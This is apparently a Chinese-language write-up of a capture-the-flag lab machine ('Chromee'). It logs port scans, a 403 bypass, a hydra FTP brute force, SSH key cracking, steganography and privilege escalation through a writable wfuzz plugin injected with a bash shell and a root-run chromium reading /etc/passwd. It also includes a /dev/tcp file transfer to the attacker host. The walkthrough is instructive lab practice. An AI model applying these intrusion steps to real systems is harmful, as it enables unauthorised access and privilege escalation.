又是新靶机没做出来系列。。。
端口扫描 这里有第一个坑,就是要用全端口扫描,可以扫到一个ftp端口 这里用nc直接连上去可以知道是什么服务
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(root㉿kakeru)-[~/tmp] └─# nmap -p- 192.168.80.38 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-29 15:27 CST Nmap scan report for bogon (192.168.80.38) Host is up (0.0088s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8080/tcp open http-proxy 23333/tcp open elxmgmt MAC Address: C8:21:58:16:CF:C4 (Intel Corporate) Nmap done : 1 IP address (1 host up) scanned in 11.96 seconds ┌──(root㉿kakeru)-[~/tmp] └─# nc 192.168.80.38 23333 220 (vsFTPd 3.0.3)
ftp 不能直接匿名登录 提示需要密码 那就去web里找找信息
web探测 web 有80端口和8080端口
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 ┌──(root㉿kakeru)-[~/tmp] └─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.80.38 -x php,txt,jpg,js =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.80.38 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt,jpg,js [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /post.php (Status: 200) [Size: 3] /secret.php (Status: 200) [Size: 549] ┌──(root㉿kakeru)-[~/tmp] └─# curl 192.168.80.38/secret.php <!DOCTYPE html> <html> <head> <title>Secret</title> </head> <body> <?php $greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好'); $visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']); echo "<h1>{$greeting},adriana</h1>"; echo "<p>当前时间:" . date('Y-m-d H:i:s') . "</p>"; echo "<p>你的IP:{$visitorIP}</p>"; if (isset($_GET['aaa'])) { $file_content = file_get_contents('/opt/note/dic.txt'); echo $file_content; } else { die(); } ?> </body> </html>
80端口有作用的是这个secret.php 但是直接访问发现直接给了php源码,没有解析 ,但是可以看到这个逻辑是如果有aaa参数就会给一个字典
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(root㉿kakeru)-[~/tmp] └─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.80.38:8080 -x php,txt,jpg,js =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.80.38:8080 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: txt,jpg,js,php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /javascript (Status: 301) [Size: 326] [--> http://192.168.80.38:8080/javascript/] /silence (Status: 403) [Size: 280]
8080端口一个403状态码的silence目录, 如果直接访问8080端口,有一个提示,用bypass bypass403 这个是一个工具可以尝试绕过一些403
1 2 3 ┌──(root㉿kakeru)-[~/tmp] └─# curl 192.168.80.38:8080 <h2>You may need to bypass!</h2>
1 2 3 4 5 6 [+] HTTP Method Bypass ---------------------- GET : Status: 403, Length : 280 POST : Status: 200, Length : 616 ð ╭───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮ ╰─> PAYLOAD : curl -ks '192.168.80.38:8080/silence' -L -H 'User-Agent: Mozilla/5.0' -X POST
发现用post请求是可以访问的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 ┌──(root㉿kakeru)-[~/tmp] └─# curl -ks '192.168.80.38:8080/silence' -L -H 'User-Agent: Mozilla/5.0' -X POSTcurl -ks '192.168.80.38:8080/silence' -L -H 'User-Agent: Mozilla/5.0' -X POST <!DOCTYPE html> <html> <head> <title>Silence</title> <style> body { font-family: Arial, sans-serif; text-align: center; margin: 0; padding: 0; } .container { display: flex; justify-content: center; align-items: center; height: 100vh; } h1 { font-size: 30px; } p { font-size: 18px; color: #888; } </style> </head> <body> <div class="container"> <div> <h1>Silence</h1> <p>We are working to improve our website.</p> <p>contact: support@chromee.hmv</p> </div> </div> </body> </html> <!DOCTYPE html> <html> <head> <title>Silence</title> <style> body { font-family: Arial, sans-serif; text-align: center; margin: 0; padding: 0; } .container { display: flex; justify-content: center; align-items: center; height: 100vh; } h1 { font-size: 30px; } p { font-size: 18px; color: #888; } </style> </head> <body> <div class="container"> <div> <h1>Silence</h1> <p>We are working to improve our website.</p> <p>contact: support@chromee.hmv</p> </div> </div> </body> </html> ┌──(root㉿kakeru)-[~/tmp] └─# curl -ks '192.168.80.38:8080/silence' -L -H 'User-Agent: Mozilla/5.0' -X POSTcurl -ks '192.168.80.38:8080/silence' -L -H 'User-Agent: Mozilla/5.0' -X POST <!DOCTYPE html> <html> <head> <title>Silence</title> <style> body { font-family: Arial, sans-serif; text-align: center; margin: 0; padding: 0; } .container { display: flex; justify-content: center; align-items: center; height: 100vh; } h1 { font-size: 30px; } p { font-size: 18px; color: #888; } </style> </head> <body> <div class="container"> <div> <h1>Silence</h1> <p>We are working to improve our website.</p> <p>contact: support@chromee.hmv</p> </div> </div> </body> </html> <!DOCTYPE html> <html> <head> <title>Silence</title> <style> body { font-family: Arial, sans-serif; text-align: center; margin: 0; padding: 0; } .container { display: flex; justify-content: center; align-items: center; height: 100vh; } h1 { font-size: 30px; } p { font-size: 18px; color: #888; } </style> </head> <body> <div class="container"> <div> <h1>Silence</h1> <p>We are working to improve our website.</p> <p>contact: support@chromee.hmv</p> </div> </div> </body> </html>
这里给了一个域名chromee.hmv 所以修改域名,之后再访问secret.php 就可以解析了
1 2 3 4 5 6 7 8 9 10 11 12 13 ┌──(root㉿kakeru)-[~/tmp] └─# curl chromee.hmv/secret.php?aaa=1 <!DOCTYPE html> <html> <head> <title>Secret</title> </head> <body> <h1>早上好,adriana</h1><p>当前时间:2025-03-29 08:42:54</p><p>你的IP:192.168.80.11</p>The Lost Key Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward. </body> </html>
这里给了一个文本,这个文本中还给了一个用户名adriana 然后把这个文本用cupp生成一个字典,给一个文本生成字典都用cupp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 ┌──(root㉿kakeru)-[~/tmp] └─# cupp -w tmp.txt /usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ ' print(" \ # User") /usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ ' print(" \ \033[1;31m,__,\033[1;m # Passwords") /usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ ' print(" \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m # Profiler") /usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ ' print(" \033[1;31m(__) )\ \033[1;m ") ___________ cupp.py! # Common \ # User \ ,__, # Passwords \ (oo)____ # Profiler (__) )\ ||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ] [ Mebus | https://github.com/Mebus/] ************************************************* * WARNING!!! * * Using large wordlists in some * * options bellow is NOT recommended! * ************************************************* > Do you want to concatenate all words from wordlist? Y/[N]: > Do you want to add special chars at the end of words? Y/[N]: > Do you want to add some random numbers at the end of words? Y/[N]: > Leet mode? (i.e. leet = 1337) Y/[N]: [+] Now making a dictionary... [+] Sorting list and removing duplicates... [+] Saving dictionary to tmp.txt.cupp.txt, counting 663 words. [+] Now load your pistolero with tmp.txt.cupp.txt and shoot! Good luck! ┌──(root㉿kakeru)-[~/tmp] └─# hydra -l adriana -P tmp.txt.cupp.txt ftp://192.168.80.38:23333 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-29 15:44:53 [DATA] max 16 tasks per 1 server, overall 16 tasks, 663 login tries (l:1/p:663), ~42 tries per task [DATA] attacking ftp://192.168.80.38:23333/ [23333][ftp] host: 192.168.80.38 login: adriana password: Lily2020 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-29 15:44:58
登录上ftp之后,这里也有一个坑,有一个...文件,然后就拿到一个ssh私钥,去家目录可以看看有哪些用户
1 2 3 lftp adriana@192.168.80.38:~> ls /home drwxr-x--- 4 1000 1000 4096 Mar 09 07:59 follower drwxr-x--- 3 1001 1001 4096 Mar 07 12:39 softly
然后用john破解一下密码
1 2 3 4 5 ┌──(root㉿kakeru)-[~/tmp] └─# ssh2john id_rsa > hash ┌──(root㉿kakeru)-[~/tmp] └─# john hash --wordlist /usr/share/wordlists/rockyou.txt
得到id_rsa密码 cassandra
1 2 3 4 5 6 ┌──(root㉿kakeru)-[~/tmp] └─# ssh follower@192.168.80.38 -p 22 -i id_rsa Enter passphrase for key 'id_rsa': -bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8) follower@Chromee:~$ id uid=1000(follower) gid=1000(follower) groups=1000(follower)
提权 follower 没有sudo 查了一下follower的文件,也没有什么特殊的,上传pspy64看看定时任务
1 2 3 4 5 6 2025 /03/ 29 09 :11 :38 CMD : UID = 0 PID = 1 | /sbin/ init 2025 /03/ 29 09 :12 :01 CMD : UID = 0 PID = 1621 | /usr/ sbin/ CRON - f 2025 /03/ 29 09 :12 :01 CMD : UID = 0 PID = 1622 | /usr/ sbin/ CRON - f 2025 /03/ 29 09 :12 :01 CMD : UID = 0 PID = 1623 | /bin/ sh - c /root/ script.sh 2025 /03/ 29 09 :12 :01 CMD : UID = 0 PID = 1624 | /bin/ bash /root/ script.sh ^ CExiting program... (interrupt)
发现会执行一个/root/script.sh
1 2 3 4 5 6 7 follower@Chromee:~$ ls cat.gif linpeas.sh note.txt pspy64 follower@Chromee:~$ cat note.txt Think about rotations and the cat’s secrets. 47 is not just a number, it's a twist of fate.
有一个gif文件,然后提示是47 47 是rot47 把这个gif文件拿到本地来看一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 ──(root㉿kakeru)-[~/tmp] └─# nc -lp 1234 > cat.gif follower@Chromee:~$ cat cat.gif > /dev/tcp/192.168.80.11/1234 exiftool cat.gif AGAAAABB70bmFVK ExifTool Version Number : 13.00 File Name : cat.gif Directory : . File Size : 3.5 MB File Modification Date/Time : 2025:03:29 16:17:46+08:00 File Access Date/Time : 2025:03:29 16:17:34+08:00 File Inode Change Date/Time : 2025:03:29 16:17:46+08:00 File Permissions : -rw-r--r-- File Type : GIF File Type Extension : gif MIME Type : image/gif GIF Version : 89a Image Width : 640 Image Height : 640 Has Color Map : Yes Color Resolution Depth : 8 Bits Per Pixel : 8 Background Color : 0 Animation Iterations : Infinite Comment : Imagemagick Convert Timeline Profile CMM Type : Profile Version : 4.3.0 Profile Class : Display Device Profile Color Space Data : RGB Profile Connection Space : XYZ Profile Date Time : 2016:01:01 00:00:00 Profile File Signature : acsp Primary Platform : Unknown () CMM Flags : Not Embedded, Independent Device Manufacturer : Device Model : Device Attributes : Reflective, Glossy, Positive, Color Rendering Intent : Media-Relative Colorimetric Connection Space Illuminant : 0.9642 1 0.82491 Profile Creator : Profile ID : 0 Profile Description : sRGB Red Matrix Column : 0.43607 0.22249 0.01392 Green Matrix Column : 0.38515 0.71687 0.09708 Blue Matrix Column : 0.14307 0.06061 0.7141 Media White Point : 0.9642 1 0.82491 Red Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract) Green Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract) Blue Tone Reproduction Curve : (Binary data 40 bytes, use -b option to extract) Profile Copyright : Google Inc. 2016 Frame Count : 13 Duration : 6.31 s Image Size : 640x640 Megapixels : 0.410
这里有一个Imagemagick Convert Timeline时间轴的提示,上网搜一下gif隐写,利用identify工具 得到一些数字
1 2 3 ┌──(root㉿kakeru)-[~/tmp] └─# identify -format "%T " cat.gif 65 98 65 100 102 98 67 6 6 6 6 6 6
这里前面的数字都是ascii码的字母,所以就用这些可见字符的数字,然后用cyberchef rot47 要先用decimal转成字符p3p573r 这个密码不是另一个用户的密码,这是follower的密码
找一下root的文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 follower@Chromee:/home$ find / -user root -print 2>/dev/null | grep -Pi -v "sys|sys|proc|run|usr|boot|dev|etc|var" / /mnt /bin /root /home /home/follower/cat.gif /lib32 /sbin /vmlinuz.old /lost+found /libx32 /lib /initrd.img.old /vmlinuz /tmp /tmp/.Test-unix /tmp/.XIM-unix /tmp/.ICE-unix /tmp/.font-unix /tmp/.X11-unix /srv /srv/zeus.conf /srv/ftp /initrd.img /opt /opt/note/... /opt/note/dic.txt /opt/... /media /media/cdrom /media/cdrom0 /lib64
这里可以发现一个srv目录下的配置文件zeus.conf
1 2 3 4 follower@Chromee:/srv$ cat zeus.conf permit follower as softly cmd /usr/local/bin/wfuzz permit nopass :softly as root cmd /usr/bin/chromium permit nopass :softly as root cmd /usr/bin/kill
之前没有见过这种东西,问了gpt知道这是doas的规则 现在follower可以用softly执行 /usr/local/bin/wfuzz
1 2 3 4 5 6 7 8 9 follower@Chromee:/srv$ cat /usr/local/bin/wfuzz # !/usr/bin/python3 # -*- coding: utf-8 -*- import re import sys from wfuzz.wfuzz import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) sys.exit(main())
发现这里导入了库wfuzz.wfuzz
1 2 3 4 5 6 7 follower@Chromee:/srv$ find / -name 'wfuzz' -print 2>/dev/null /usr/local/bin/wfuzz /usr/local/lib/python3.9/dist-packages/wfuzz follower@Chromee:/srv$ cd /usr/local/lib/python3.9/dist-packages/wfuzz follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ ls __init__.py __pycache__ api.py dictionaries.py externals factories fuzzobjects.py fuzzrequest.py mixins.py myqueues.py plugin_api ui __main__.py advanced.rst core.py exception.py facade.py filters fuzzqueues.py helpers myhttp.py options.py plugins wfuzz.py
找到文件之后,尝试劫持库 先找到一个可以写入的文件 然后写bash
1 2 3 4 follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find . -writable -print 2>/dev/null ./plugins/payloads/file.py follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ echo "import os;os.system('/bin/bash')" > ./plugins/payloads/file.py
再用softly执行wfuzz就能拿到softly的shell了
1 2 3 4 5 follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ doas -u softly /usr/local/bin/wfuzz -w /home/note.txt -u 127.0.0.1 Password: /usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ doas -u softly /usr/local/bin/wfuzz -w /home/note.txt -u 127.0.0.1 Password: /usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly 下一步就是要用/usr/bin/chromium提权了,这个是个谷歌浏览器
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 softly@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ doas -u root /usr/bin/chromium --no-sandbox --headless --disable-gpu -dump-dom file:///etc/passwd [0329/095206.275413:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable. <html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:109::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin follower:x:1000:1000::/home/follower:/bin/bash softly:x:1001:1001::/home/softly:/bin/bash ftp:x:106:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin </pre></body></html>
这样就可以读取任意文件就解决了。 看来我确实是做不出来 这些参数少一个或者用错都不行 最后的–dump-dom是打印出内容
下面还有一个预期方案,就是开一个调试窗口
1 2 3 4 5 6 7 8 9 10 11 12 13 14 softly@Chromee:/home/follower$ doas -u root /usr/bin/chromium --no-sandbox --headless --remote-debugging-port=9222 http://127.0.0.1 & [2] 18087 ss -lntup Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* tcp LISTEN 0 10 127.0.0.1:8000 0.0.0.0:* tcp LISTEN 0 10 127.0.0.1:9222 0.0.0.0:* tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 32 *:23333 *:* tcp LISTEN 0 511 [::]:80 [::]:* tcp LISTEN 0 511 *:8080 *:* tcp LISTEN 0 128 [::]:22 [::]:*
现在上传一个socat,然后转发一下端口
1 2 softly@Chromee:~$ ./socat TCP-LISTEN:9999,fork TCP4:127.0.0.1:9222 & [3] 18212
因为现在是调试过程,要到浏览器中chrome://inspectl里面新加一个
总结
学到了bypass是什么以及怎么用
给了一个文件的提示用cupp
…隐藏文件
出了sudo还有doas命令也能有其他用户的执行权限
得到密码除了可能是其他用户的,还有可能是自己的密码
看一个py程序可以尝试是否能找到可以写入的包,提权
socat转发端口
学习了chromium这个命令,了解了一些参数,以及谷歌浏览器的调试窗口
